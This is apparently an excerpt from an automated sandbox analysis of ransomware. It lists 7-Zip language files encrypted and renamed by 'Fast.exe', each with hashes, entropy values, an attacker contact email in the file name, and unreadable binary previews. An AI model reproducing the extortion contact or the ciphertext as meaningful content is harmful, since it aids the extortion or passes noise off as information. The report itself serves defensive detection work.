    Entropy (8bit):7.991462487250459
    Encrypted:true
    SSDEEP:384:bq/btQkxB83yyBCoLlCUMvLy1unHfoXKwVge6j50juQIqFLMimxPucXiTNd7ndRR:Kp8iyBqUMDyawa66jau4sxPucXUNd7nl
    MD5:6252A53AA3409C6663D5C889C7C6FB61
    SHA1:49AF6F345D264DA45E24C3CB83578B59953BE9F3
    SHA-256:AB8B976D342046CC42A608612D52D5E3F5830B918A6B8F3C41273FB28D6FE3D2
    SHA-512:471DB564CE4A2E0900F7141273B5E55BF0D398B712ECF48CFB7EF598BBE7AEF5C91903C3CFEC4AA346FE0AE1C673416443534F66D8554101BD1A79F001E1DEFC
    Malicious:true
    Preview:...M4..........s.xY.Z.C..U......{n...s.8...+G.O>.2.I.e..F..f..'q..CC..~]e...<...<......$b.e.4.%>..M.!B......4.h..l.?..w..w...!."....p..s...%'.W.-8....,,..me...v4....Bv...@.8..+.. ..9.u....~....U.bg......n.[.0.F.F.......c{G.7$'..x.x..p.....4...S..4.2..t...L....euJ...b[.u.{,.i........h.F.}.C...JA..8N.*..........au..SE.d......U....Y.../..v..[.z..]...}.?...........(k...z.q..I........Mb...(q..N.;7y..W...`i.nm.]~....f#...[[|..;4.Au.:K...Q...VI...4..5&...3...>..O..B..P....,.T.&\_<...>%......d......wW..A...L.../....}...v.....].....K...:Q.O\imy.S.y......S....wrP.N.#h.Jo..&..9p....................<REe.@ ..U......R....;...9T.~n.>...._....V..i|.!.....%...8.e0.x*...{...$.`...zb...../DzH..........$.'8.H....r..m\..1.,(. dS.Zh.53.{..wE.Z.6#..4..G.c'.Pr...0..N.k..,D..Q.q.3...U...qY....-`..I=&...P72.F.....\..I....h.%....].8.c.4..m...@..n.e....D...p%.p....iC....../...A..n.8i.............B..\v..50.zY..6..h..K.7C...._0..Y..9|.c...-.P|[..>u.....}..rxI.

    C:\Program Files\7-Zip\Lang\mr.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):11026
    Entropy (8bit):7.979367777954131
    Encrypted:false
    SSDEEP:192:9mCk9yHcJ1Clbxk/XcKgncwZn33rjK7oYVbuG/6t5tCLyHA:W18XKg5H6sYVl/6v4YA
    MD5:7B5F00AF8F64C7E7C9E3FFC389E8E62B
    SHA1:8922CCAC5B212257A6F647CA82291AA77C727675
    SHA-256:9D86F4B367B5DE3B725597C583337E2D97BB3614675E8B16F18B5771B1632A13
    SHA-512:A5EFF0A0C9B754B011215FAED34B546459B168C0D093405487CD3C66E18D4B693980A9717B29CAB16C6F2B1F4CA2F53C0F89B80421D4807A5338C976A7EBEA1C
    Malicious:false
    Preview:....T^#....G*.2.S.6. ,#P.-.qa.s..K.Z...."..vZ.........T.t.e.5.c..n=.M.(*H"....V.A......_.i3D.....B"C.t...jf.F..Og...Y.........=..:.....f..U.[...... .).=....yT^-.K...=...*s.........9....g-...Pxft^...#5`..Q..G.j....0.e....e..ro....J.;R.O.;."m,~E.....kf..T.ld....,Q...`.GP..S....;....A.\ ..o....W..U .b ...&D.m$#qjq.W.Y.....~N=....5|&.2..N.R.e..2-ghQ...W.O.2k7n......L.\h.h.e)k....zTw.K-r.k......-n....b........:..4..4.z.e>....&.Yk..b.8...H.....%,:;s..C.C>.G....A*D#.....>cl#..4.c.?c>.e.._....-..a=.x@.i....,..=X.Y3Hs.:o~.*5...f.M..p. ..X$AY.N.<..83.x(2..;$.R%/X.l.#.+.1..$._xO.rGU*q.!y...d.ms\BIF..Xis.?e.#.d..T..x.6.A..)T+...,....!^\z.............j.C..|G.".p.....v..0...*..)....6.v{.d...>......&.."UU..z..}A1.././.K.k..xy.....#...2|..U.....Z..$....{M....=...cT..s.a...+..?..6..w.=..ph0u.l.Q..al..>....QKS..?..N.:._Vl9.gc..|..i.........%....Zv.l.2.^.N..i..U^f.R.].j.1..,M......j...:.d..9.$.O!.OW......`.\...>..B.<M.#6"..(#.....es....3IW.TLKTe.C....L....m

    C:\Program Files\7-Zip\Lang\ms.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):5426
    Entropy (8bit):7.964779733923164
    Encrypted:false
    SSDEEP:96:O0BAUQ/kf/18j4omsyHK0rdqWdcPBPW6F3bRITsd3ssUtcTLMSq+JWuvLA:PKUhQ4omFHTrBdc5u6dRDd89Gvq+vvLA
    MD5:13D3C2C1488DD3A330BB13E9A84B2EF4
    SHA1:837057096F46ACD5EDEBC35F41E109DFDC10227F
    SHA-256:5FF8AB0576A3672B03F86BD909A4350AFBCA47B6A8B238E8D9BED6A3BECA7B59
    SHA-512:699A9FD8AC605DBA66EBD39C46863963CCD80D3461B70CE0A0CD7BC0025BF95805F064E760B4943B51E5BCE66101FF8DB687CE63A86749B523970D45B3DC75F7
    Malicious:false
    Preview:.0}K.H....U....c.".X.*.CB...{.".0.........;.....G.5.f..t..*o...SLV.mg.f.:.p...N~}Tp.k7....0Z.W.g...e...n....[@(uC.t...X..>."....H.[.8e M.==...V.56j\*.A.9Bz.>?.....;...Uoxn^.M..G...Js.K.P#...ZMqh..._..#.-..D..D+.5v.........4I...[s.+..:...TryP.ow.G..)(.WDT..I..C]Pg.]....a.9.~.^..v,....*!Q.i.XP..+.~_q.d..".C{........@/.O..".n7.1.$.l.m..B..w..j.v.:...&..0'....\.dq.k...L.#..q..B...ms.T...q....S.2.GY.....,.....c.t.(.<40o.{..H&V...t..P.x.....Ub..l..!R.....;...x..i.e...q..8.q1./#J...g...`.m...V......."..........$.+..,.z......8j.;......x.w.s..'J..~...{o.U._L...<..%.fF..c...$..!...Q...T.N...^.YK...&?.&.,M..WK.w.p........\i/r.8.0....2...!.....)2...h.I7...v..j.l.#...q.B.g.0.v.O..&.....S..tw..)..>..8.S..:..>Hp..V....+S..0.@.8..>Y........S.Y.7..&pt.3Z....@x-....QJ......P&....... ... .[.,8g&.....R|..WD.....m^../.,+...H..j&...uK@N..:...G.%.lx........|....A-.......s.2UX.....qiR0g..:..t3M@......}h........!..n\.........5.H[.\.%F..?........nZ.......3.M.T6.f1.

    C:\Program Files\7-Zip\Lang\nb.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):6290
    Entropy (8bit):7.966352830951981
    Encrypted:false
    SSDEEP:96:4gc64jkIHru6IPTKYVid/aGIB7fPI45dsZU0iywO/njOMFEGxi6BgBBo8A:4gc63OupPTKYECjPDzROvbX4XpA
    MD5:6F940801496C70C626EB0F31EFD3E2A5
    SHA1:7CB36E5FC78839542C9AEAF5D8EBC23C130806E2
    SHA-256:9143C485A49D1BBF4D1B2589B6FF4FE789F5BEFA48C7A91649190A3F9B038DFC
    SHA-512:88EA2AA13B89080822B3212477BDC295EFDF7398DCD3C17FC977797BCFEC30EEC9B7B9E2CFE7703C857B491FD27FF19050A44892D9985E26815588F25042029B
    Malicious:false
    Preview:....E.U.ti..W.?..(.6..K..O..../y.LL..)..aG.Y4..............F..........S.I.0.j.]7\..nF..TBH..........j".Xg.6C.l..m......0K..d.H...c..5<..c..Z....O........0......`?L".X$b.G&.(./.......Q.z.........e.O.X.>...\.c.7....tZ. i....".T....pw...#..~Kg.6DC..%.8[..z(.J!...[.^../.`....#3......d....-..R=.|..~GQy.......|.......@0J3.*<j..q(h.......n.....|.j...G.VJ@..l..."........6:.w..:H..8......".w.x..e.ym.b >..;A<..8.qz..L.....IO..s.q_.....fT..U...<%O.o..".).h.@1]...6$.....Q.56e.m*....c..B4..~..|.).....tC..5.D....NF..g..;>p.Z(...(..,S.@.........6K.[...:..!A0...U....k..Ox:#.#.5".{:.g-...eq..!.&..E....W....<2B..d....C........y..8q....Q......5O.B....yr.3.....2.X..><.U..m.8J._..w..=.._....z..j.._Tn.\.m.(.......;....<..(..<.hu...v.<....o...%...4....[..%.y.4*zL....f.QU.s.r.......s...1....2 .._.$.....k......$..].*...S..k.i..l._nnM.<ba...`N|e.!....@Y....V;.V.X....k;V.L|nNm..y<.N[A.}yy..o..a...1......2..Y..0.g..Rx.^r...{...k..J0muy....M.c.`....P.6p.i.Y..

    C:\Program Files\7-Zip\Lang\ne.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):13682
    Entropy (8bit):7.985747705490096
    Encrypted:false
    SSDEEP:192:UQ1OCbgCmtExd6jMA3wsT0c47ZCFLYXcwLH+cB3eThdipfza13utGJ9W2wZE8A7d:vdgLIdYjwqLYXhelT+L30HZtAA
    MD5:161BA1C1822853E0CC449716DA867863
    SHA1:14D0CD5D2AF343C70A7156592506282E9240C984
    SHA-256:275126AB6F74C0500D3649FB6512967F14184EAB8325120238E4B0A1CE2438AA
    SHA-512:F1B06E6D7754616730936257D84A46DEF766AF65FD16AFD01E2177479FA7007DEC486A6E36516A8C0D95221AD8D6FC8A9C0010B9156D87127BDC768657453DF9
    Malicious:false
    Preview:B...d.c=."F.n..h....Z.v..X.==..._C..._...!..P.O...y.q2xh.J..f)....J..C........(....v!Q4P .DQg.....~....J8.xu..U~..... (8. .Fw....G...B.[....`..#...)...#....0.);&.....Z.....x0....).Y..57^...?.L}.\V},..+4......7s..6.Z*^_3....=c..T..8...6.......l:...Z..:f^..H:..}..........1.V..]..Ah..o!h......?>M..R~..l.$1....m.A...K.{...v.u..3......JVM.......N7..!.J.m.D...E._.@..H.#lb....b......D3.....o.; E..RD........d.t.t c...7..ZIa.....($......k.c.F.Z..%..")U%...sQ..+.pa...!.1T...TNA...;[......d..n....WL....U.N....=...{q1........t.S..f.IsU.$.9.=..@pxX..g....fj.G)T...G`...F.q.....8..$6.f.....xg.._...r..A...... +k..4m....f..J.Q7..^2. ..hE.7)G.3eD}\........QC..0..Jc..)[.....N.....:%..[.AE.......cG6.......2[....&.#..&.t.D...3..9TFh$...7.... ....N.=Y.,.d]...].... .6..[.....|...C^].@)aw...0.u5 .).n...$F..~g~.P.7...U.P....Q.f.{..X...j0.1n!..?....QG...1...0....X.u....=.%.."...P?...K...[...^.."........'.)K8........J.>o%.W.S.U.!}\.1~.=.....:.ma1... ..~vaI.T..I....4

    C:\Program Files\7-Zip\Lang\nl.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):9762
    Entropy (8bit):7.979007471278486
    Encrypted:false
    SSDEEP:192:cteZssh9mZx3/Sg1Zmk4BMiXmm1k6SP15VFRzHAC5WvBO1XOo0qvQlUA:cte6o0rPV/mk4KSmm1kR1t1AC5uO9ES0
    MD5:17CAA18989114328BB66821A58E4D21A
    SHA1:6464334DFBD0EA8CE34F9972ED12349785EEA587
    SHA-256:C44036DD64CAE16A520EF8A98901B3BF784EB7F8B8CE8665799F664ABE915234
    SHA-512:301EC9F92E4272C022C299E9B3791F0D164E9AEEDB58884C306ED5CCDE58B0633DD359951662A2D3A79FA6A6F3A141D88A4BD44763806495FAD5C9911868C9BE
    Malicious:false
    Preview:.`..Y*....#...z......E..f.6....f._Jn.(...@...w..0._.....L._...(d.#..O.S..].7.@..hx....[..z....i.....Z..t$...w......Eo..E...X#.0.i..M;dt.-.ZM;.......78.d7...*.T......?.0q.....R.@.j!7{...V#..w...U(arO[....Vx..L...9.8.S...n../.|kQ.....W5..3............<g8..@%......#.X...$m.-.d.............s.$....G..0........!....z......$..,e.t.XBxw."...Op\...L<GD.}..L.~....u.*.e..y9..7Nl...h....y..d.L.,.@.... ...\.?C..AF{B.)i.X..jx..@P..,....V....."}..Q...e._.....+}..G...`....l..G..\.9tE.25W.C... c}lO.D^@!;...`3x....... G6].V....g9.......J.Q..C..t.......$...U1..dt:....Vh.....,|...W..k...<0|t..C[=d<..]..$.i..*..Q.r{./...']..Z.9.~^.^a......@LWXQF./..:.j.Ej.v......G..f...I{rz..O...q....?.:..b.T]b.EiV.w.......C...s...7.62..S4..4)K...Y..\`....._....5d....CYAg.?G.}W.|]....v.../w...@4...if.7a._`q.I1......c....t.<.fy.>.v..2.U....#.G..3V.../.#..........-.G..K.......6.2....d,.7.=.Rx>Y....5..q'.O(."6.Z.a{....!.j..-.W..++..i.a...m.%...1s...>d^/8..N>...<mOT`+.M..

    C:\Program Files\7-Zip\Lang\nn.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):6162
    Entropy (8bit):7.965803044859307
    Encrypted:false
    SSDEEP:96:jthd7GCsFKE2eCbRJo/FGbeYZ847AOJppo91YhmoR0F1A:Pdlsl2eccGbeYe473pu91Yhmo+3A
    MD5:8084915915A06BC9754B2E647F213BE3
    SHA1:EBF5013561110BF93E1F28D39A8ABA770AD184FA
    SHA-256:F38B1D4C7676C01ADCE23AC736E433B15B168A83AE60261D9B4A2A9C982EC8F2
    SHA-512:71B7AE69B426DDD33891A62ED45FB7A63D205CFC595CAEAC5F05F56277E63A506228E1C60817E88483CFAA0DFEB69320A78391907461DAF05696BD357516D7BD
    Malicious:false
    Preview:..6...G..~&..G..&....g.Z....'....\%E.....9m..^+K ...........@.^...U..S.-?..$n0...g.`i. {.[c.....KA.&%\...+....\.3.3.;g.....1.'.....B,...Z.OW.=?.{..d.G.LN..NF0.._....){;}HpOx.r.......A ..5.O3.x.?......<...h.=..k...O.6d..E.......90l.....e.<.i..d._. [...>p.~~...../.c...r.FJ.Q.O 7.U..".Xe...!....g.c.B...7.^...[.r....4.R.e..r...|..E.V.f.....lM..I.. .._...V..I..f.....^...y^!...|.!2h.i.w...#j.%..m....t.4:7B.p......Y.....C..c.....@.[.u&......r..7./.r.u...#.......K.5,uc.K#&....e..N%wfA&h..7@..1"..4.4..q:......*......q.-.j.b.U..N....VTM...Q.Z.....}...[..w.*...n.m.ik}."".!@y.R3...8.W\...b.3h|C...Ti..AR...".wP........9:..H...-...&d..y.s.M.my..bJ.._h......[.....A.5;.R....2n..%..gc^9..u...!B...2..Qn.@8W._...A..O...=P:..aF..:'B.M{\.r>....D.%-..X.A.5y..!8. ...^H.4.*.sQ{.......y.....z`.hH%.2.h.......bQ.*..u..:.o..q...}-....Q......>M9./.#...R..B.25.^Lw...V...@|`."..5..+........<qZ.Z.....#...@.|....H..<W..%..Ij..g.........0.5...Wd...-.b..L@.x.._..g$.Dt..

    C:\Program Files\7-Zip\Lang\pa-in.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):14914
    Entropy (8bit):7.9888213829595385
    Encrypted:false
    SSDEEP:384:cIqNtgI+85hHcSml1KHrjjtJD7IyNJ0lwNewt2W9S0Q:cI7I7HpmlQHHjf7DJqcu0Q
    MD5:2703E9B76EA9F13A2D8F88B2C527AEF2
    SHA1:FD8F0A4C995820479618553BC70256FB54F45B0F
    SHA-256:B5FEF4BD4C3CD1153C8A6004E448FDDA3A82FC35EEA4E3BCDEA2D1C5D1856845
    SHA-512:06613A88946C54CD538DFCB9B3D15D8218BC69BC018F9DF847FE7BEAEACA0396F8CDD5F30BB202CBA510330D6BDF6643D6E210734D8F9405E7CDF50625E16876
    Malicious:false
    Preview:....DF\........0~......=..bS....0...Z{..Sy..CO?=..(...g.z.f.....l......E.E..kp<...T3.#...n..d... ..Dn..#..x.F.....t.xaf;..W]..N.....x...1vj........r5'dn.q>...C.......X..D....].6.\..=I$......-F...g.......7.....G|.....93....Z......#..t...p..q.^/.4...Yo........v.H.%..F...#..........cX.k..2@.*.v.O...D=c.?..^..((.O^2./.v.1..7Zb..My;.sP.1w......y).>).....z.'!.+.....Z^:.n..].h..\RL....d.._0.c..e...r5|K^f.[..j...dSPz..6.:T.Yw*..VK.T..Uf.S..v....c.<....}..f*.2Fv.k.=o.l.o.C/..\.J8.l..K..ts...q...,.b...Co77[........=P...b.....xQv.4d-@...Qx.7\Oh.&.....~'.._..i.f...#?...E.....:.OY......5.R|....s.....E..s.mr%...G_..Y.2.A.....H.......y/J7.T<....8..T.Z.).....d....r$..yo.....ap.0.{ 5....d..25.4..8.G}g...m...A...%...'.dy.~M.L............_...... ........D..F..2T...x_..n.w'...._3...x!c...$. ...e...A4.....;/${...Gz..](..7....%...eZ.M.j.s..r:.'........4....{..%..oI(.i....$h..o.ssdT...;.W-.J..aD@....K..}9;..#...S....m....>.....t...c.E.H.......#..GB....=

    C:\Program Files\7-Zip\Lang\pl.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):10050
    Entropy (8bit):7.982116019784045
    Encrypted:false
    SSDEEP:192:FokHzOWKF3YVBD+SdwRUHaJlA5LcWIWJeMIUY+t40rfN7CeEmJrNtPKC/tyzoHOG:GrKBDRdwRUHYlA5AbWJXzY+t40r179JT
    MD5:D04AD0CBEBBAD45AAD1A6B94D165EA9C
    SHA1:BB516B79965B42E914EFFB1EA663778763685C44
    SHA-256:3601B43D075DDA961BF189B47BA7FB16D57F38EE420C959157F60AD75919C3E2
    SHA-512:8B029D5A85C62B40B1BFF0DD57B00A268CADDC9136B90A8EDED1DA20E1F53ED5B2D1B64FC6C782028C92FF70D44764749AB852D8903758525EFB21D3A9FA92D8
    Malicious:false
    Preview:i.... M.?..M....K...A%(.p...P.F;*....u>RS....&....O*.x....8.0.q.....1*.P.....1....y.3...TZ..>.D.}zF..H.B..X_"...s .>.n..s"T?v...'.d.10yL.#......)7..E...b.l..A......Xa].!.U.Q.?u;%Z..mJ..%v.T.Z.N.7X.f.......B....%.B....Q.2..+...r..8.v..7n.c.U......j....}.h._..9...{h.\..1&...._ .)...I.n.65.z..Ss?..I.H.X.-y.1Xne..R...x..9.KTvv._.{!,Ok....mu.f...k.Z. ;....{..[d.dI,..3..........*.D.."Yw6D.......f..l..........^...."...9...-.G.*._.\.X...#k.....2&..Ok.#.7.G3..l5.s..,_.Om.@</%.e....,..{g&.tm".v..<..\Q:..1nT.....Y...a..8.(!.mE..p..,..U...sj..0\|O......`...E .\.%..!...5v.D%..\....Nyo....lRlcR`bZ...d.).5..XQ.o..P.9.4>..bG;~.........2..`..R.......AyX....N[..I .d..D...-...........b......^..5.Kc.5..Q.{.m..3|..U......O&...."'V.............w.....2..D.H.;.E....'qA......L...$.J@.G.s.3.........y..e...C...u.....A...{..pJ1R.8..F.-...0.J..{.]G.5,yF.W...%.q<....FQ\{t...yh..HJ-..m{M.$9./.eXs.5i.B...... ..P..Y..X...EO"8..o8...WU..j....[;B.Y.C......:.6.c0:.GT.....

    C:\Program Files\7-Zip\Lang\ps.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):8882
    Entropy (8bit):7.978664610726197
    Encrypted:false
    SSDEEP:192:aHo+GqKaky8UWRkgoEpezCuyneEnuFW7OQdk3c+E0yZl8PPQpOE0ODpWA:8o+uy2RgE6CeEnIMk3yzczODkA
    MD5:86A0DFA76E66719C3C86654234D68A04
    SHA1:21B979876321F840D1302196EABFA7BBF43A6946
    SHA-256:C589D003968C01322CC8CA6CB059A39D22D1A77403431C9B5501BBF271159108
    SHA-512:7E26D46EC18A44E3C29DBB03882B8E2B1FBEC8F195D13C54E4F627CE7C1D9AE96F2B8411B4D61F676A5BAC5FAADEA1AFF6B4F00994B60F74216FA2B6F91E7DBF
    Malicious:false
    Preview:....q..'h......$......d.8.l. PjJ.;...@./..6..X?ud..d<'&,.%@^x...7.......iFR..(8{...4-..j....5b..e...r6....a.%|.....'...G...O...<X..e.2>...."6.DD\..\. [mp..9DA_X....D...........1B...%w..7t........6b.)...];.........TIU._.L<.`..ncs.....9aGT......@G../.Y...%..}r0=.T..3]I...U.n......<F..dT.&rb-Q..^.3m.......|l$...q|J0.{.,..6L..Q3...>......ffT..]<b.8.....;...e,..t.8...sIL.^J+T...y,..]......[...wI...J?....[..r.........; ...G.9.....{#=v.]...q.....X.DE.6.jbq...+...h....U7O...J-.xb..(I:.d2.,.j\....G..........c?.>....w4?.....zbR.ab...;..L....9.^.O.{........:..aA.......pO.dB.e..<df.&..y.._. Va.=.....8.%..{..(.R....'O.S...O.n..42).t.YvajWK.z.h.@.P4a.;.i...&.!...Ay..M..z.....j.....g.L1..f.__.....%`.a.....M...1..a.z.n....u...b. D.7qv.X..0..~..`kj..r;..ia...5..6).y*..K..~..(.......f&.x.Q....:,7..w..Pbk._r...>.{.BA........QiU.[(.....;.*.......U.a..W..#4...C..}.z.".......h......m.v..ad.~...C.4.......n]f.-,..Y............S.;s..Z.&...gbTm.O(.J..$..R...!.Z.x..S...

    C:\Program Files\7-Zip\Lang\pt-br.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):10178
    Entropy (8bit):7.982704372052203
    Encrypted:false
    SSDEEP:192:jojON/V27W2Ih+UYgoSCHNfvPFqiWKLqpAyT77zwxtN9gQ:Eaz2yZYUYxoiy/770xPeQ
    MD5:4967ADAE63DE83B3B611B6150E9B99A4
    SHA1:40CBC36BF32450D78F4BE7E45D9326B7757ABD50
    SHA-256:32576589EB45D0DE6BEF879F3ABC8988C6D5802212492428F5F7D4ABE38FA5DF
    SHA-512:E6D99D787CBC9A526B005866A3AA8D471B757688F97B8ADDFD7EA66805F3BD9DD2D776A1E037942544C6BB7A575397838878365595FB091D136C144E69DDCF10
    Malicious:false
    Preview:|!...T....2..F+.=..m..J.o...jC.....g!<gaF=R'.j.C....j%..g..E.p7w.....cI.....?..`..U.L^......=.....Q..Q...p.+.X..;~.eq.?sM....@dU..$.......O.K......p.nt.,..fP...a...y.~.t.V:k...{.}.c.H.u.o...k......2.3..j..........}.gy....-....AC-+.<`.....GsQ0..:@,.....?...k%=...T....I)w..'<..}1...*[.....&-..56+Wu.Hu.=..,.R.`n*.t.Y..E......cQJ....c....8^.2s.}.....Q.O.E.R^V..tkv+..}.q).I....).......7....7[\Wn.6...\..~.-...#$....9..1...y......z:.B.u....*.c..;...?.....>1en(AI<$.0.s._....Cb5.A.O....{......}j...&.J"?.".g.:......g.v~....z.......Q...}cm1vW...;..$._1..4...RKo.....k..#Z..!...xa$.cx{i{...u...b..&..`...!VU..J.......T.,..G..eb.-"J}.?.H...J..u...W.9.Y.+-...$...c.........|....fH..cc`.......9.+.H..8.N....5...|Y.2..$...+'Z...M.../...dLB:Y..P59......3....(...7.zI8@..m...n...rY...../.i..Y..P....+.*..A...HZ...e..0.NX.}....2..j.9_...A.............|T...u....)z........[gz.$..X....).?3FA.....~...P.D.-Yv...R..f@+.6nr1.z.I^..7.W..6...h...@r.E..3S....<.._..R<Z%..~.h..

    C:\Program Files\7-Zip\Lang\pt.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):10130
    Entropy (8bit):7.980912691339917
    Encrypted:false
    SSDEEP:192:5Lp30wcysB1m+Z9hvywXzfUW6LsGa80X1184bEor2RIsWxqIzAcA:xSrNLrdf8LsD/84wo3vzVA
    MD5:9971F75B1488A90FBEA6DBE0D87492CC
    SHA1:64E271071FE3790E5BA9196920F689925F68D684
    SHA-256:12F1461D0DA2C1F80A43177D043703FBA8AF5450C010E19E0A1E468F10E5852D
    SHA-512:40DDE7533BDE84E07ED1A81DF0F48F20DEF214569D45BBCF6B4D6E1A2F8EA47E20BAEC8742FED0E4948B227924D0B36C1CA883F0B98C92B9B375B88ADDF265C7
    Malicious:false
    Preview:CC+<.<...^..va!r.\6..q.....199j@.Xybx!c}H.Z*.....X_..z-.L"(........l.V.R.x..z...o.....e..<.?.....>.......X....A..M/[....qs.......f....C*....K*d...).... \'`l.:..m.......1pW,F.ci.4...Y07.......<.A.e...'.....7... ...q..v.=.m.|......O......<@..].5..:...nH......Y....a......L..........OM..S.x*V1............./0...h..0..:.}...5....R........wW..=.gf.T......g.z+......9..)T..8..6."..:..#..P./....w..1..G....i....^a..6iR|...<.0...LeB(.g.a../0.l.(.......)RDP.3..C.%.=NV..!H.~..`......!_2.}.wu..A..G..]@..).UW$5....|...B...~...F6.l..U..~..BgH..c...r...5..i..s......vG...\..HGS..Z.".q......+.@..L!....S3yE....v9r...O.LA=d..mq.1!a.........x....X....y.$.4d..$.9.\..k..LJ..3..h.Qu.....xBCq... z.[......W.B.,$.Y.q;..z.....&.AD8S.b@&.....k_..p.m=...).40..7..v...AWV..)1.C.f...?K..9.j....n].k...,.,..6..l.;|E......4rL%&.s......).$.TV..n?.n..2..E...P.1uYS....i.\...P...;..`...G.np/..@..J.D...D.v"5.'.Cy.0.v/\........\...(.#...Y.P...#.df.....\.y..W\..Tiuc

    C:\Program Files\7-Zip\Lang\ro.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):7810
    Entropy (8bit):7.976487883850117
    Encrypted:false
    SSDEEP:192:bqMUE51F/ymj/d0GvOwidmOM755KCY04HTpinYA:0U1Fj3vOhcOM7AZHliYA
    MD5:E0F59CF095E3DB86309122CEBB7DD7F8
    SHA1:9EA3CF0879C3E02AFA791D06ABF466033D5AE7F1
    SHA-256:799EA66A194405E889009D6BB7D3074C33FD27F2820FC96EE956D3EB5489FF62
    SHA-512:69233E46268C35B3717048CA4F95CC65862362DCE33FCB13DB615AA0166D2894EE924278AF89D7DE8C5218CB587DAD881F09F8649A4C18503C6D9095AEF51D88
    Malicious:false
    Preview:.Ke..F}.Lr..q...4..Bi.`V...S...5.=N...h...;.....R.ap...Q.......2.c....d....#p3d.3d.wt.....[pC~.....].~...|...e,..}){..{..t.rBr.~.W*..).s....N._y.g.8....=..Y.8...k..+....`..V....-.....$. *+....^..-....m.`&..w...g(.$.z3...|...c..1.....U.\...q<.5q....q0../....f..z..E%.^zk;<.>.ex{...sNH.qw`.vF..n.^!.1.nq%..ZJ<h..U..b.V..E.4L..#...9A.....h".}....)<......j..A7.u......~...W..7a....:D.n.L........}.p......$.5....O.hyYf..6p.8|.|.....#.~..!\.-A....r*...D..`.y.l.3.H..?.. ...^e..P4$..(..Hho./R.N>...33.z.1..."l..uV.....Q{/..:)!..2.\....2M.z.q.rv........_z..(.cr}..R....KzO,.4T.jsiqy.].....-.'.C..k.K.d....*..~My...?.8....9&G..c<R\..7..D......i..>](N..s..z..Gd...~\n."..a...j9..PQ..$|.6..B-H..b.u.m..s}. ..yS....3t.<.h..E..V.....D%.~..K.t.....g....%u~....M.G...Bt16..;..*.sbPh.s..l6..b.T....$.i.q0f...T..`..(.........s.Q.....}...{...........+..=...u..6N...[....tt...&Q.J"C..}?Y..j...S.X->........a.......s.....aU.....O ....@Z.s.....u>.F..=..'..}..

    C:\Program Files\7-Zip\Lang\ru.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):15602
    Entropy (8bit):7.98516350809758
    Encrypted:false
    SSDEEP:384:zGrdfvDAMh+8p6Lnjwc5gHlWiWm7T+Qg6HsA:yrBthHoLjRqlv+QgOsA
    MD5:DDD65CA388BC472F086623F9A229DEE8
    SHA1:21B3C3F0889B04CB019B75301E5F348943639A54
    SHA-256:D0774AFD5FB3EE91F1D8E4BA01B08DC9512F78CF8242095E9777F3F884C47330
    SHA-512:ED204B02C7C2C339BED8E2C2BBBC0B7A90C786D460CAC09539B9A79303565DF0CCDD4F5701EB99355F88C8CDD5E1FC7B180AA32E5572E23C9795143A4841DF90
    Malicious:false
    Preview:.K-@.O?n.G.m.h.*=P.H.....=dU..B"k8....{bu.T...?..sX%...ot(.s....1..[Z...%..N*.Xjy'....3D.f.M.4....\3.H.+.+L.yo.$.'.C....$R9 ...J...)B............pt(...E...Up..q(...3..j5.W..78x0.....a.Gbu.f{..K...r;....R..."..R#.$5.K...q.../nv.4{.W.\......@.:.1.....J...,y..-a6..)..J.;-Pa*..c..b..S....... ]$N..!*.C....uq.:.T..*.\.....T.........f.=K..Y ...+!!.JomHO^.pz..2=e......*...y......6...'...4.d..nP.....Q7st.A@l k..).$.w0.Dt....g..8.)-@B...1.V....H.H;+.m.}=d...4..C.....w........f.s`..@..W:.C..!.6&.p.~...OT.T&....2..NL$.&.....h.=K$!}.]<\N.N....1.H5....1..=Rn.\...y].)Y......P..k.V.!.....v.......%......... Ha.C..}...<..)..fo..{.d]..}..e`k...v.V..5......;..]g.....,v..e...B....D........K.4.K....v.V..%C.w......o...+-D.+...YF....?'.?M.I..9A.I....P.L..9>.........o:.:LQ....j......X.P.r..h..).....R..X3.......<..;...qft%'..A.2.....G.....W..|....X.(...;Bf.W.-itz.p..M..$e..=...Q.V.lK..x...dSBh.!.7`.P.n<...p.G.."`...)_..)..9H.3...c..P.w...]..^.....;....{'..w......

    C:\Program Files\7-Zip\Lang\sa.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):19474
    Entropy (8bit):7.989041661896751
    Encrypted:false
